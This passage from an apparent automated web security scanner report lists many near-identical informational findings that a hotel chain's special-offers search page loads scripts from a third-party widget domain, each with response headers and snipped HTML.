Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:22:41 GMT
Content-Length: 151318

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232101620511250" type="text/javascript"></script>
...[SNIP]...

5.133. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232697216136250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 18:55:21 GMT
Content-Length: 296017

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232697216136250" type="text/javascript"></script>
...[SNIP]...

5.134. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112257855000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:40:25 GMT
Content-Length: 151017

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112257855000" type="text/javascript"></script>
...[SNIP]...

5.135. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113400355000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:42:19 GMT
Content-Length: 151036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113400355000" type="text/javascript"></script>
...[SNIP]...

5.136. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113211605000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:42:01 GMT
Content-Length: 151007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113211605000" type="text/javascript"></script>
...[SNIP]...

5.137. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232099106917500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:18:29 GMT
Content-Length: 296085

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232099106917500" type="text/javascript"></script>
...[SNIP]...

5.138. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113721761250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:42:52 GMT
Content-Length: 151008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113721761250" type="text/javascript"></script>
...[SNIP]...

5.139. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107000198750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:31:39 GMT
Content-Length: 151237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107000198750" type="text/javascript"></script>
...[SNIP]...

5.140. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108397855000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:33:59 GMT
Content-Length: 151206

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108397855000" type="text/javascript"></script>
...[SNIP]...

5.141. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106772230000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:31:17 GMT
Content-Length: 151212

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106772230000" type="text/javascript"></script>
...[SNIP]...

5.142. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108404417500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:34:00 GMT
Content-Length: 151008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232108404417500" type="text/javascript"></script>
...[SNIP]...

5.143. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111185667500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:38:37 GMT
Content-Length: 150980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111185667500" type="text/javascript"></script>
...[SNIP]...

5.144. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106379417500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:30:37 GMT
Content-Length: 151039

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106379417500" type="text/javascript"></script>
...[SNIP]...

5.145. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107858636250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:33:04 GMT
Content-Length: 151033

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107858636250" type="text/javascript"></script>
...[SNIP]...

5.146. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107302855000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:32:09 GMT
Content-Length: 151330

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107302855000" type="text/javascript"></script>
...[SNIP]...

5.147. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115661136250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:46:05 GMT
Content-Length: 151064

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232115661136250" type="text/javascript"></script>
...[SNIP]...

5.148. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232098607698750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:17:40 GMT
Content-Length: 150980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232098607698750" type="text/javascript"></script>
...[SNIP]...

5.149. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232715351292500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 19:25:34 GMT
Content-Length: 296073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232715351292500" type="text/javascript"></script>
...[SNIP]...

5.150. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111681605000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:27 GMT
Content-Length: 151030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111681605000" type="text/javascript"></script>
...[SNIP]...

5.151. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111714573750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:31 GMT
Content-Length: 151023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111714573750" type="text/javascript"></script>
...[SNIP]...

5.152. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232098688011250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:17:48 GMT
Content-Length: 151001

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232098688011250" type="text/javascript"></script>
...[SNIP]...

5.153. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112022073750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:40:01 GMT
Content-Length: 151064

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112022073750" type="text/javascript"></script>
...[SNIP]...

5.154. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107775355000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:32:57 GMT
Content-Length: 151148

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107775355000" type="text/javascript"></script>
...[SNIP]...

5.155. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232101843636250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
